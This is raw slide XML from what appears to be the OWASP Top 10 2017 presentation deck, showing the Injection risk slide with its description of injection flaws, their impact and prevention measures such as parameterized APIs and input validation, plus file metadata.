                <a:cs typeface="Arial"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The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface, or migrate to use ORMs or Entity Framework. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NB: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Positive or "whitelist"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For any residual dynamic queries, escape special characters using the specific escape syntax for that interpreter. OWASP's Java Encoder and similar libraries provide such escaping routines. NB: SQL structure such as table names, column names, and so on cannot be escaped, and thus user-supplied structure names are dangerous. This is a common issue in report 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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="4A1647"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>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a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="821112922"/>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a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exploitability</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100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Prevalence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>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kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="OpenSymbo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lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FEFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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endParaRPr lang="en-US" sz="1000" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Almost any source of data can be an injection vector, including users, parameters, external and internal web services, and all types of users. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t> occur when an attacker can send hostile data to an interpreter. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injection flaws</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>are very prevalent, particularly in legacy code. They are often found in SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP Headers, expression languages, ORM queries. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injection flaws are easy to discover when examining code. Scanners and fuzzers can help attackers find injection flaws.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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TotalTime>
  <Words>11584</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Letter Paper (8.5x11 in)</PresentationFormat>
  <Paragraphs>1231</Paragraphs>
  <Slides>27</Slides>
  <Notes>25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OpenSymbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wide Latin</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Golden Master</vt:lpstr>
      <vt:lpstr>Table of Contents</vt:lpstr>
      <vt:lpstr>Foreword</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Release Notes</vt:lpstr>
      <vt:lpstr>Application Security Risks</vt:lpstr>
      <vt:lpstr>OWASP Top 10 2017 Application Security Risks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Testing</vt:lpstr>
      <vt:lpstr>What’s Next for Organizations</vt:lpstr>
      <vt:lpstr>What’s Next for Application Managers</vt:lpstr>
      <vt:lpstr>Note About Risks</vt:lpstr>
      <vt:lpstr>Details About Risk Factors</vt:lpstr>
      <vt:lpstr>Methodology and Data</vt:lpstr>
      <vt:lpstr>Acknowledgements</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>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dc:description/>
  <cp:lastModifiedBy>Andrew van der Stock</cp:lastModifiedBy>
  <cp:revision>1735</cp:revision>
  <cp:lastPrinted>2017-10-20T01:34:36Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-26T02:06:32Z</dcterms:modified>
  <cp:category/>
  <cp:contentStatus>RC2_RCC1</cp:contentStatus>
</cp:coreProperties>
</file>